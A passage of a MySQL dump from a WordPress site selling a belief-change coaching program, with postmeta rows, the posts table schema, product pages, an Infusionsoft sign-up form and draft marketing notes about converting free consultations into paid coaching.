(4075, 3276, '_oembed_time_cd8dcb0370926307180c9c733d802fee', '1506992899'),
(4090, 3283, '_oembed_e4ba8811bc9f581bf63a2bac8c593329', '<iframe width="474" height="267" src="https://www.youtube.com/embed/qidoJdIU2G0?feature=oembed" frameborder="0" allowfullscreen></iframe>'),
(4091, 3283, '_oembed_time_e4ba8811bc9f581bf63a2bac8c593329', '1507217533'),
(4142, 3302, '_oembed_e3d319b395fec33f4ecdba7ff21a51c2', '<iframe width="474" height="267" src="https://www.youtube.com/embed/XKOItJHZABU?feature=oembed" frameborder="0" allowfullscreen></iframe>'),
(4143, 3302, '_oembed_time_e3d319b395fec33f4ecdba7ff21a51c2', '1507904031'),
(4298, 3414, '_oembed_54f1968ca04e3e2f2861593aec544313', '<iframe width="474" height="267" src="https://www.youtube.com/embed/VuoFmsndx3Y?feature=oembed" frameborder="0" gesture="media" allowfullscreen></iframe>'),
(4299, 3414, '_oembed_time_54f1968ca04e3e2f2861593aec544313', '1510165344'),
(4452, 3492, 'cat', 'Essays'),
(4453, 3492, 'subcat', 'Environmental Studies'),
(4456, 3492, '_oembed_37844ad21498f1c62b32b9ffa730059d', '{{unknown}}'),
(4457, 3492, '_oembed_0e481d7b344352ca8aa939b9d128891a', '{{unknown}}'),
(4458, 3492, '_oembed_e1dc467b1564740b828af5e1f2081bb3', '{{unknown}}'),
(5290, 928, '_wpb_vc_js_status', 'false'),
(5291, 928, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(7310, 3605, '_oembed_247635f72c73bff43734404a5f60a31a', '<iframe width="474" height="267" src="https://www.youtube.com/embed/kwzGJ_B4ZZg?feature=oembed" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>'),
(4517, 3524, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(4518, 3524, '_edit_lock', '1513160845:135'),
(4519, 3524, '_edit_last', '135'),
(4520, 3524, '_wp_page_template', 'page-templates/full-width.php'),
(4521, 3524, 'rt_custom_css', ''),
(4522, 3524, '_wpb_vc_js_status', 'true'),
(4523, 3524, '_wpb_shortcodes_custom_css', '.vc_custom_1513160187683{padding-top: 30px !important;}'),
(4532, 3531, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(4533, 3531, '_edit_lock', '1513246644:135'),
(4534, 3531, '_edit_last', '135'),
(4535, 3531, '_wp_page_template', 'page-templates/full-width.php'),
(4536, 3531, 'rt_custom_css', ''),
(4537, 3531, '_wpb_vc_js_status', 'true'),
(4539, 3531, '_wpb_shortcodes_custom_css', '.vc_custom_1513245538115{padding-top: 30px !important;}'),
(5288, 3538, 'rt_custom_css', 'h1 {\r\n    font-family: Muli;\r\n}\r\n.icon_box strong {\r\n    font-family: Muli !important;\r\n}\r\n'),
(5289, 3538, '_wpb_vc_js_status', 'false'),
(5286, 3538, '_edit_last', '135'),
(5287, 3538, '_wp_page_template', 'default'),
(5285, 3538, '_edit_lock', '1513513464:135'),
(5284, 3538, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(5891, 3570, '_wp_page_template', 'page-templates/full-width.php'),
(5890, 3570, '_edit_last', '135'),
(5888, 3570, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(5892, 3570, 'rt_custom_css', ''),
(5893, 3570, '_wpb_vc_js_status', 'true');

-- --------------------------------------------------------

--
-- Table structure for table `cyb_posts`
--

CREATE TABLE IF NOT EXISTS `cyb_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`),
  KEY `post_name` (`post_name`(191))
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=4000 ;

--
-- Dumping data for table `cyb_posts`
--

INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(679, 2, '2014-06-08 17:39:36', '2014-06-08 22:39:36', '', 'shutterstock_178323935', '', 'inherit', 'closed', 'open', '', 'shutterstock_178323935', '', '', '2014-06-08 17:39:36', '2014-06-08 22:39:36', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/06/shutterstock_178323935.jpg', 0, 'attachment', 'image/jpeg', 0),
(680, 2, '2014-06-08 17:40:26', '2014-06-08 22:40:26', '', 'shutterstock_96922118', '', 'inherit', 'closed', 'open', '', 'shutterstock_96922118', '', '', '2014-06-08 17:40:26', '2014-06-08 22:40:26', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/06/shutterstock_96922118.jpg', 0, 'attachment', 'image/jpeg', 0),
(681, 2, '2014-06-08 17:40:54', '2014-06-08 22:40:54', '', 'shutterstock_67060984', '', 'inherit', 'closed', 'open', '', 'shutterstock_67060984', '', '', '2014-06-08 17:40:54', '2014-06-08 22:40:54', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/06/shutterstock_67060984.jpg', 0, 'attachment', 'image/jpeg', 0),
(682, 2, '2014-06-08 17:41:27', '2014-06-08 22:41:27', '', 'shutterstock_173538659', '', 'inherit', 'closed', 'open', '', 'shutterstock_173538659', '', '', '2014-06-08 17:41:27', '2014-06-08 22:41:27', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/06/shutterstock_173538659.jpg', 0, 'attachment', 'image/jpeg', 0),
(683, 2, '2014-06-08 17:42:06', '2014-06-08 22:42:06', '', 'shutterstock_93378286', '', 'inherit', 'closed', 'open', '', 'shutterstock_93378286', '', '', '2014-06-08 17:42:06', '2014-06-08 22:42:06', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/06/shutterstock_93378286.jpg', 0, 'attachment', 'image/jpeg', 0),
(684, 2, '2014-06-08 17:42:37', '2014-06-08 22:42:37', '', 'shutterstock_76794007', '', 'inherit', 'closed', 'open', '', 'shutterstock_76794007', '', '', '2014-06-08 17:42:37', '2014-06-08 22:42:37', '', 0, 'http://beliefcloset.com/cyb/wp-content/uploads/2014/06/shutterstock_76794007.jpg', 0, 'attachment', 'image/jpeg', 0),
(102, 4194, '2014-03-06 13:21:45', '2014-03-06 18:21:45', '[vfb id=1]', 'all products', '', 'inherit', 'open', 'open', '', '86-revision-v1', '', '', '2014-03-06 13:21:45', '2014-03-06 18:21:45', '', 86, 'http://beliefcloset.com/cyb/86-revision-v1', 0, 'revision', '', 0),
(103, 4194, '2014-03-06 13:24:21', '2014-03-06 18:24:21', '[vfb id=1]', 'Checkout', '', 'inherit', 'open', 'open', '', '86-revision-v1', '', '', '2014-03-06 13:24:21', '2014-03-06 18:24:21', '', 86, 'http://beliefcloset.com/cyb/86-revision-v1', 0, 'revision', '', 0),
(86, 4194, '2014-03-06 15:55:06', '2014-03-06 15:55:06', '[vfb id=1]', 'Register', '', 'publish', 'closed', 'open', '', 'register', '', '', '2014-03-21 12:09:06', '2014-03-21 17:09:06', '', 0, 'http://beliefcloset.com/cyb/?page_id=86', 0, 'page', '', 0),
(96, 4194, '2014-03-06 16:16:40', '2014-03-06 16:16:40', 'Purchase the Clear Your Beliefs Program\r\n\r\nReceive the full package including 7 recorded sessions, 2 bonus recordings, a complete set of PDF transcripts, plus additional bonuses. Listen online, or download them, and go through the sessions at your convenience. Each session takes you through a BeliefCloset journey, and the deletion of one belief. Listen again to delete additional beliefs.', 'The Clear Your Beliefs Program', 'You''ll receive the complete Clear Your Beliefs package, including 7 recorded sessions, 2 bonus recordings, a set of PDF transcripts, plus additional bonuses. Listen online or download the sessions and listen at your convenience. Each session takes you through a complete BeliefCloset journey.', 'publish', 'closed', 'closed', '', 'buy-the-program-alone', '', '', '2014-06-25 16:13:49', '2014-06-25 21:13:49', '', 0, 'http://beliefcloset.com/cyb/?post_type=product&#038;p=96', 0, 'product', '', 0),
(1087, 2, '2014-06-25 16:13:49', '2014-06-25 21:13:49', 'Purchase the Clear Your Beliefs Program\r\n\r\nReceive the full package including 7 recorded sessions, 2 bonus recordings, a complete set of PDF transcripts, plus additional bonuses. Listen online, or download them, and go through the sessions at your convenience. Each session takes you through a BeliefCloset journey, and the deletion of one belief. Listen again to delete additional beliefs.', 'The Clear Your Beliefs Program', 'You''ll receive the complete Clear Your Beliefs package, including 7 recorded sessions, 2 bonus recordings, a set of PDF transcripts, plus additional bonuses. Listen online or download the sessions and listen at your convenience. Each session takes you through a complete BeliefCloset journey.', 'inherit', 'closed', 'open', '', '96-revision-v1', '', '', '2014-06-25 16:13:49', '2014-06-25 21:13:49', '', 96, 'http://clearyourbeliefs.com/96-revision-v1', 0, 'revision', '', 0),
(98, 4194, '2014-03-06 16:19:27', '2014-03-06 16:19:27', '', 'CYB Program + 3.5 hours of Coaching', 'In addition to everything listed above, you''ll receive 30 minutes of professional coaching by phone (or Skype) each week, from a Clear Your Beliefs Coach.  He or she will keep you on track, answer questions, guide your work, and take you deeper into your subconscious mind than you can travel by yourself.   Value: $600.00.  ', 'publish', 'closed', 'closed', '', 'buy-program-3-5-hours-of-coaching-pcp-2', '', '', '2014-06-25 16:45:11', '2014-06-25 21:45:11', '', 0, 'http://beliefcloset.com/cyb/?post_type=product&#038;p=98', 0, 'product', '', 0),
(99, 4194, '2014-03-06 16:21:27', '2014-03-06 16:21:27', 'Get 60 min of coaching per week or per class', 'CYB Program + 7 hours of Coaching', 'In addition to the complete Clear Your Beliefs Program, you''ll receive seven hours of professional coaching (by phone or Skype) from a Clear Your Beliefs Coach.  He or she will guide you for an hour each week, taking you deep into your subconscious mind – deeper than you can go by yourself.   Value: $850.00.  ', 'publish', 'closed', 'closed', '', 'buy-program-7-hours-of-coaching-pcp-3', '', '', '2014-06-25 16:45:58', '2014-06-25 21:45:58', '', 0, 'http://beliefcloset.com/cyb/?post_type=product&#038;p=99', 0, 'product', '', 0),
(100, 4194, '2014-03-06 16:23:10', '2014-03-06 21:23:10', '', 'Free 15-minute Consultation', 'Not sure if coaching is right for you?  Choose a free 15-minute consultation. A professional Clear Your Beliefs Coach will answer your questions and give you a direct experience of the power of the process (NOT a sales pitch). You''ll also receive our beautiful multimedia eBook, "Transform Your Beliefs," as a gift.  Value: $100. ', 'publish', 'closed', 'closed', '', 'free-consultation-fc-plus-benefits-ebook', '', '', '2016-08-03 15:17:46', '2016-08-03 20:17:46', '', 0, 'http://beliefcloset.com/cyb/?post_type=product&#038;p=100', 0, 'product', '', 0),
(107, 4194, '2014-03-06 14:27:32', '2014-03-06 19:27:32', '<h1 style="text-align: center;">Free 15-minute Consultation\r\nwith a Clear Your Beliefs Coach</h1>\r\nWould you like to find out whether <em>Clear Your Beliefs</em> is right for you?\r\n\r\nRegister for a free 15-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "<em><strong>Clear Your Beliefs</strong></em>," as a gift. It''s a beautiful introduction to the topic of beliefs, belief change, and the <em>Clear Your Beliefs program</em>.\r\n\r\nSchedule your free consultation now:  \r\n\r\n<iframe width="750" height="600" src="https://my.timedriver.com/P4T2P?sh=1" frameborder="0"></iframe>\r\n\r\nOne of our professional <em>Clear Your Beliefs Coaches</em> will contact you at the appointed time.\r\n\r\nMost people find this initial consultation so valuable that they want to go deeper immediately. After 15-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\r\n\r\nAfter your session, please write to us at <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>, and let us know about your experience.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n</div>', 'Free 15-minute Consultation', '', 'publish', 'closed', 'closed', '', 'free-20-minute-consultation', '', '', '2014-12-03 19:15:33', '2014-12-04 00:15:33', '', 0, 'http://beliefcloset.com/cyb/?page_id=107', 0, 'page', '', 0),
(1906, 2, '2014-12-03 20:54:23', '2014-12-04 01:54:23', '', 'Free 15-minute Consultation', 'Not sure if coaching is right for you?  Choose a free 20-minute consultation. A professional Clear Your Beliefs Coach will answer your questions and give you a direct experience of the power of the process (NOT a sales pitch). You''ll also receive our beautiful multimedia eBook, "Transform Your Beliefs," as a gift.  Value: $100. ', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-12-03 20:54:23', '2014-12-04 01:54:23', '', 100, 'http://clearyourbeliefs.com/100-revision-v1', 0, 'revision', '', 0),
(1907, 2, '2014-12-03 20:55:32', '2014-12-04 01:55:32', '', 'Free 20-minute Consultation', 'Not sure if coaching is right for you?  Choose a free 20-minute consultation. A professional Clear Your Beliefs Coach will answer your questions and give you a direct experience of the power of the process (NOT a sales pitch). You''ll also receive our beautiful multimedia eBook, "Transform Your Beliefs," as a gift.  Value: $100. ', 'inherit', 'closed', 'open', '', '100-revision-v1', '', '', '2014-12-03 20:55:32', '2014-12-04 01:55:32', '', 100, 'http://clearyourbeliefs.com/100-revision-v1', 0, 'revision', '', 0),
(1063, 2, '2014-06-25 11:26:23', '2014-06-25 16:26:23', 'Would you like to find out whether Clear Your Beliefs is right for you? Sign up for free ½ hour consultation with one of our Clear Your Beliefs Coaches.  They''ll answer your questions and give you a taste of what''s possible.\r\n\r\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," an introduction to beliefs and the BeliefCloset Process.\r\n\r\nFill out this form to schedule your 20-minute consultation.  One of our BeliefCloset Coaches will respond to you within 72 hours.\r\n<h6>[Form]</h6>\r\n<h6></h6>', 'Free 20-minute Consultation', '', 'inherit', 'closed', 'open', '', '107-revision-v1', '', '', '2014-06-25 11:26:23', '2014-06-25 16:26:23', '', 107, 'http://clearyourbeliefs.com/107-revision-v1', 0, 'revision', '', 0),
(108, 4194, '2014-03-06 14:27:32', '2014-03-06 19:27:32', 'Need help deciding if BC is right for you? Sign up for free ½ hour of coaching, get free eBook and a taste of the process. This is what we’ll do exactly. It’s not a sales call. We’ll show you how effective it is to work with a professional.  eBook alone: $10.\r\n\r\nThe eBook should attract people to the process.  Re-write toward next steps.  eBook should accurately represent the process, and get them excited.  Geared toward conversion on top of inherent value.  It’s a gateway.  Take out the process. Walk through examples, vivid, touch their own experience.  Embed other videos, testimonials.  Don’t give away curriculum.\r\n\r\nClick HERE to schedule your 20-minute session –', 'Free 20-minute Consultation', '', 'inherit', 'open', 'open', '', '107-revision-v1', '', '', '2014-03-06 14:27:32', '2014-03-06 19:27:32', '', 107, 'http://beliefcloset.com/cyb/107-revision-v1', 0, 'revision', '', 0),
(111, 4194, '2014-08-26 18:43:11', '2014-08-26 23:43:11', '<h1 style="text-align: center;">Free 20-minute Consultation\nwith a Clear Your Beliefs Coach</h1>\nWould you like to find out whether Clear Your Beliefs is right for you?\n\nRegister for a free 20-minute consultation with a professional <em>Clear Your Beliefs Coach</em>.  He or she will answer your questions, and give you a taste of what''s possible with our program.\n\nIn addition, we''ll send you our free multimedia eBook, "Transform Your Beliefs," as a gift.  It''s a beautiful primer on beliefs and the Clear Your Beliefs program.\n\nFill out this form to schedule your 20-minute consultation.  A Clear Your Beliefs Coach will respond to you within 72 hours.\n\nMany people find this initial consultation so valuable that they want to go deeper immediately.  After 20-minutes, your Coach will offer you the option of extending your session to a full hour, at additional cost.\n\nWe''d love to get your feedback after you have your 20-minute consultation. Please write to us at support@clearyourbeliefs.com, and let us know about your experience.\n\n&nbsp;\n<div class="icon_box" style="width: 100%; margin: 30px auto; min-height: 650px;">\n\n<h1 style="text-align: center;">Schedule Your Free 20-minute Consultation</h1>\n<div style="width: 47%; float: left;">\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/fce61116f5a9a85d3022cf39699950ce" method="POST"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /><input name="inf_form_name" type="hidden" value="CYB 20 min free consult w/ Ebook" /><input name="infusionsoft_version" type="hidden" value="1.30.0.511" />\n<div class="infusion-field">\n\n<label for="inf_field_FirstName">First Name *</label>\n\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_LastName">Last Name *</label>\n\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_City"> City</label>\n\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_State"> State</label>\n\n<input id="inf_field_State" class="infusion-field-input-container" name="inf_field_State" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_Country"> Country</label>\n\n<select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Åland Islands">Åland Islands</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas">Bahamas</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia">Bolivia</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory">British Indian Ocean Territory</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cape Verde">Cape Verde</option><option value="Cayman Islands">Cayman Islands</option><option value="Central African Republic">Central African Republic</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option><option value="Colombia">Colombia</option><option value="Comoros">Comoros</option><option value="Congo">Congo</option><option value="Democratic Republic Of Congo">Democratic Republic Of Congo</option><option value="Cook Islands">Cook Islands</option><option value="Costa Rica">Costa Rica</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Cyprus">Cyprus</option><option value="Czech Republic">Czech Republic</option><option value="Côte D''Ivoire">Côte D''Ivoire</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic">Dominican Republic</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands">Falkland Islands</option><option value="Faroe Islands">Faroe Islands</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories">French Southern Territories</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Greece">Greece</option><option value="Greenland">Greenland</option><option value="Grenada">Grenada</option><option value="Guadeloupe">Guadeloupe</option><option value="Guam">Guam</option><option value="Guatemala">Guatemala</option><option value="Guernsey">Guernsey</option><option value="Guinea">Guinea</option><option value="Guinea-Bissau">Guinea-Bissau</option><option value="Guyana">Guyana</option><option value="Haiti">Haiti</option><option value="Heard and McDonald Islands">Heard and McDonald Islands</option><option value="Holy See (Vatican City State)">Holy See (Vatican City State)</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hungary">Hungary</option><option value="Iceland">Iceland</option><option value="India">India</option><option value="Indonesia">Indonesia</option><option value="Iran">Iran</option><option value="Iraq">Iraq</option><option value="Ireland">Ireland</option><option value="Isle of Man">Isle of Man</option><option value="Israel">Israel</option><option value="Italy">Italy</option><option value="Jamaica">Jamaica</option><option value="Japan">Japan</option><option value="Jersey">Jersey</option><option value="Jordan">Jordan</option><option value="Kazakhstan">Kazakhstan</option><option value="Kenya">Kenya</option><option value="Kiribati">Kiribati</option><option value="North Korea">North Korea</option><option value="South Korea">South Korea</option><option value="Kuwait">Kuwait</option><option value="Kyrgyzstan">Kyrgyzstan</option><option value="Laos">Laos</option><option value="Latvia">Latvia</option><option value="Lebanon">Lebanon</option><option value="Lesotho">Lesotho</option><option value="Liberia">Liberia</option><option value="Libya">Libya</option><option value="Liechtenstein">Liechtenstein</option><option value="Lithuania">Lithuania</option><option value="Luxembourg">Luxembourg</option><option value="Macao">Macao</option><option value="Republic of Macedonia">Republic of Macedonia</option><option value="Madagascar">Madagascar</option><option value="Malawi">Malawi</option><option value="Malaysia">Malaysia</option><option value="Maldives">Maldives</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Marshall Islands">Marshall Islands</option><option value="Martinique">Martinique</option><option value="Mauritania">Mauritania</option><option value="Mauritius">Mauritius</option><option value="Mayotte">Mayotte</option><option value="Mexico">Mexico</option><option value="Federated States of Micronesia">Federated States of Micronesia</option><option value="Moldova">Moldova</option><option value="Monaco">Monaco</option><option value="Mongolia">Mongolia</option><option value="Montenegro">Montenegro</option><option value="Montserrat">Montserrat</option><option value="Morocco">Morocco</option><option value="Mozambique">Mozambique</option><option value="Myanmar">Myanmar</option><option value="Namibia">Namibia</option><option value="Nauru">Nauru</option><option value="Nepal">Nepal</option><option value="Netherlands">Netherlands</option><option value="Netherlands Antilles">Netherlands Antilles</option><option value="New Caledonia">New Caledonia</option><option value="New Zealand">New Zealand</option><option value="Nicaragua">Nicaragua</option><option value="Niger">Niger</option><option value="Nigeria">Nigeria</option><option value="Niue">Niue</option><option value="Norfolk Island">Norfolk Island</option><option value="Northern Mariana Islands">Northern Mariana Islands</option><option value="Norway">Norway</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palau">Palau</option><option value="Palestine">Palestine</option><option value="Panama">Panama</option><option value="Papua New Guinea">Papua New Guinea</option><option value="Paraguay">Paraguay</option><option value="Peru">Peru</option><option value="Philippines">Philippines</option><option value="Pitcairn">Pitcairn</option><option value="Poland">Poland</option><option value="Portugal">Portugal</option><option value="Puerto Rico">Puerto Rico</option><option value="Qatar">Qatar</option><option value="Romania">Romania</option><option value="Russian Federation">Russian Federation</option><option value="Rwanda">Rwanda</option><option value="Réunion">Réunion</option><option value="St. Barthélemy">St. Barthélemy</option><option value="St. Helena, Ascension and Tristan Da Cunha">St. Helena, Ascension and Tristan Da Cunha</option><option value="St. Kitts And Nevis">St. Kitts And Nevis</option><option value="St. Lucia">St. Lucia</option><option value="St. Martin">St. Martin</option><option value="St. Pierre And Miquelon">St. Pierre And Miquelon</option><option value="St. Vincent And The Grenedines">St. Vincent And The Grenedines</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Sao Tome and Principe">Sao Tome and Principe</option><option value="Saudi Arabia">Saudi Arabia</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seychelles">Seychelles</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapore">Singapore</option><option value="Slovakia">Slovakia</option><option value="Slovenia">Slovenia</option><option value="Solomon Islands">Solomon Islands</option><option value="Somalia">Somalia</option><option value="South Africa">South Africa</option><option value="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option><option value="Spain">Spain</option><option value="Sri Lanka">Sri Lanka</option><option value="Sudan">Sudan</option><option value="Suriname">Suriname</option><option value="Svalbard And Jan Mayen">Svalbard And Jan Mayen</option><option value="Swaziland">Swaziland</option><option value="Sweden">Sweden</option><option value="Switzerland">Switzerland</option><option value="Syrian Arab Republic">Syrian Arab Republic</option><option value="Taiwan">Taiwan</option><option value="Tajikistan">Tajikistan</option><option value="Tanzania">Tanzania</option><option value="Thailand">Thailand</option><option value="Timor-Leste">Timor-Leste</option><option value="Togo">Togo</option><option value="Tokelau">Tokelau</option><option value="Tonga">Tonga</option><option value="Trinidad and Tobago">Trinidad and Tobago</option><option value="Tunisia">Tunisia</option><option value="Turkey">Turkey</option><option value="Turkmenistan">Turkmenistan</option><option value="Turks and Caicos Islands">Turks and Caicos Islands</option><option value="Tuvalu">Tuvalu</option><option value="Uganda">Uganda</option><option value="Ukraine">Ukraine</option><option value="United Arab Emirates">United Arab Emirates</option><option value="United Kingdom">United Kingdom</option><option value="United States">United States</option><option value="US Minor Outlying Islands">US Minor Outlying Islands</option><option value="Uruguay">Uruguay</option><option value="Uzbekistan">Uzbekistan</option><option value="Vanuatu">Vanuatu</option><option value="Venezuela">Venezuela</option><option value="Viet Nam">Viet Nam</option><option value="Virgin Islands, British">Virgin Islands, British</option><option value="Virgin Islands, U.S.">Virgin Islands, U.S.</option><option value="Wallis and Futuna">Wallis and Futuna</option><option value="Western Sahara">Western Sahara</option><option value="Yemen">Yemen</option><option value="Zambia">Zambia</option><option value="Zimbabwe">Zimbabwe</option></select>\n\n</div>\n</form></div>\n<div style="width: 47%; float: left;">\n<div class="infusion-field">\n\n<label for="inf_custom_TimeZone">Time Zone</label>\n\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_Email">Email *</label>\n\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_field_Phone1">Phone Number</label>\n\n<input id="inf_field_Phone1" class="infusion-field-input-container" name="inf_field_Phone1" type="text" />\n\n</div>\n<div class="infusion-field">\n\n<label for="inf_custom_Timetocontact">Best time to reach me by phone.</label>\n\n<input id="inf_custom_Timetocontact" class="infusion-field-input-container" name="inf_custom_Timetocontact" type="text" />\n\n</div>\n<div class="infusion-submit" style="margin: 60px auto; float: right;">\n\n<input type="submit" value="Submit" />\n\n</div>\n</div>\n</div>', 'Free 20-minute Consultation', '', 'inherit', 'open', 'open', '', '107-autosave-v1', '', '', '2014-08-26 18:43:11', '2014-08-26 23:43:11', '', 107, 'http://beliefcloset.com/cyb/107-autosave-v1', 0, 'revision', '', 0),
(112, 4194, '2014-03-06 14:31:13', '2014-03-06 19:31:13', 'Need help deciding if BC is right for you? Sign up for free ½ hour of coaching, get free eBook and a taste of the process. This is what we’ll do exactly. It’s not a sales call. We’ll show you how effective it is to work with a professional.  eBook alone: $10.\r\n\r\nThe eBook should attract people to the process.  Re-write toward next steps.  eBook should accurately represent the process, and get them excited.  Geared toward conversion on top of inherent value.  It’s a gateway.  Take out the process. Walk through examples, vivid, touch their own experience.  Embed other videos, testimonials.  Don’t give away curriculum.\r\n\r\nClick HERE to schedule your 20-minute session –\r\n<h6></h6>\r\n<h6></h6>\r\n<h6>\r\nBC Coach could convert them into a course-only sale, could convert to with consulting.\r\nHow does coach get paid for converting?  Different than handing them a sold person.  Get a little more.\r\neBook comes with any option as a bonus.\r\nPay $25 for the consult, get it back if they buy the course .  We get lead, if we don’t convert, they get ½ hour and an ebook.  If we convert, we get a sale, discounted.  If just the course, put in AR series that would upgrade them to coaching bundle.\r\nOr offer free coaching as a coupon, with a time lapse expire.\r\nAm I paying for ½ hour sales call.\r\nFree: Show you how process works, help you find core beliefs behind any problem.\r\n$100 if you want to extend and do the process.\r\n\r\nIf coach books referred client to direct coaching, no course, the Coach owes me 20% referral fee for 1 year. bil</h6>', 'Free 20-minute Consultation', '', 'inherit', 'open', 'open', '', '107-revision-v1', '', '', '2014-03-06 14:31:13', '2014-03-06 19:31:13', '', 107, 'http://beliefcloset.com/cyb/107-revision-v1', 0, 'revision', '', 0),
